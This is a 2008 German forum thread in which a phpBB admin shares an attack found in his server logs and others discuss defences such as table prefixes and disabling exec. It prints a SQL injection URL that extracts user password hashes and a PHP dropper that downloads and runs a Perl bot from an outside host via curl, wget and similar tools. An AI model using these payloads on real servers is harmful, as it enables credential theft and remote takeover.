Seite 1 von 1
Hackversuche...
Verfasst: 06.02.2008 10:05
von Markus76
Ich habe in meinen Serverlogs folgenes gefunden:
Code: Alles auswählen
/links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20 FROM%20phpbb_users%20WHERE%20user_id=http://pucorp.org/bypass2.txt?
Die Datei auf die am Schluß verwiesen wird sieht folgendermaßen aus:
Code: Alles auswählen
<title>Google Bypass</title>
<h2>PHPESSID712647120509832974891263402184712863702163897890127012873</h2><br><br>END OF BYPASS FILE<br><br><br><br><br>
<?
$url="http://pucorp.org/";
exec('cd /tmp;curl -O '.$url.'bot.txt;perl bot.txt;rm -f bot.txt*;');
exec('cd /tmp;GET '.$url.'bot.txt > bot.txt;perl bot.txt;rm -f bot.txt*;');
exec('cd /tmp;wget '.$url.'bot.txt;perl bot.txt;rm -f bot.txt*;');
exec('cd /tmp;lwp-download '.$url.'bot.txt;perl bot.txt;perl bot.txt.txt;rm -f bot.txt*;');
exec('cd /tmp;fetch '.$url.'bot.txt >bot.txt;perl bot.txt;rm -f bot.txt*;');
passthru('cd /tmp;fetch '.$url.'bot.txt >bot.txt;perl bot.txt;rm -f bot.txt*;');
passthru('cd /tmp;wget '.$url.'bot.txt;perl bot.txt;rm -f bot.txt*;');
passthru('cd /tmp;lwp-download '.$url.'bot.txt;perl bot.txt;perl bot.txt.txt;rm -f bot.txt*;');
...usw
Jetzt mache ich mit für meinen Teil keine Gedanken, da es bei mir:
1. die Datei links.php gar nicht gibt und
2. mein Tabellenpräfix bewusst nicht phpbb_ oder phpbb3_ ist
Einfach nur mal so zu Info.
Verfasst: 06.02.2008 10:26
von cYbercOsmOnauT
Sorry, aber wollen wir nun jeden blinden Hackversuch via Bots hier posten? Ich kann ja mal cback fragen, ob er einen Tagessatz seiner Logfiles postet. Dann könnt ihr Euch durch mehrere hundert "Hackversuche" durchwühlen. Via Google wird nach phpBB-Boards gesucht. Diese URLs in eine Liste gepackt und diese wiederum blind attackiert.
Diese Vorgehensweise ist auch sehr üblich. Wieso soll ein "Hacker" sich stundenlang an einem Board versuchen, wenn sein Bot es automatisch macht nd alle bekannten Lücken an allen möglichen Boards versucht. Das hunderste Board ist unsicher und bang, man ist drin. Ob es das Board von Tante Käthe ist, interessiert nicht.
War um die Jahrtausendwende in der "IIS-Zeit" nicht anders. Da wurden IP-Ranges gescannt nach IIS-Servern und diese blind attackiert. Diejenigen bei denen es funktionierte kamen automatisch in eine Liste und wurden verwendet.
Verfasst: 06.02.2008 10:36
von Markus76
Ja sorry wenn ich zur Sicherheit anderer beitragen will
Da man schön das Schema dieser Bot's und Hackversuche erkennen kann, sollte man Forenadmin's vielleicht mal drauf hinweisen, wie einfach es ist, solche simple Attacken abzuwehren.
Das Tabellenpräfix ändern und eine Unmenge an solchen "Standardangriffen" laufen ins leere.
Für mich sowieso unverständlich wieso das nicht bereits von Haus aus so empfohlen wird.
Verfasst: 07.02.2008 02:57
von mgutt
Nur mal so zum zuende denken. Hätte diese Abfrage bei Dir gegriffen, so hätte der Hacker eine Fehlermeldung erhalten, aus der er dann Rückschlüsse für weitere modifzierte Angriffe hätte ziehen können.
Es lässt sich nämlich problemlos innerhalb eines UNION SELECTS die Tabellennamen ermitteln.
D.h. er hätte das einmal in Erfahrung gebracht oder nur die Standardnamen alle durchgetestet.
Die Lücke ist hier wie gehabt UNION SELECT und =http über die URL.
Die angefügte Datei ist übrigens dazu da, alle Systembefehle durchzuchecken, daher sollten exec(), passthru() und system() auch nicht aktiv sein.
Übrigens hat man pro Tag zwischen 2-5% solcher Angriffsversuche, daher würde eine Veröffentlichung nichts bringen. Es ist effektiv zu spät, wenn man sich die Logs anschaut. Daher sind auch entsprechende Statistik-Tools total überflüssige Lastfresser.
Logs anschauen ist also Zeitverschwendung. Es macht mehr Sinn die Zeit zu nutzen sein eigenes Board zu hacken, in dem man sich auf einschlägigen Seiten informiert und neueste Lücken versucht zu verstehen und zu schließen.
Gruß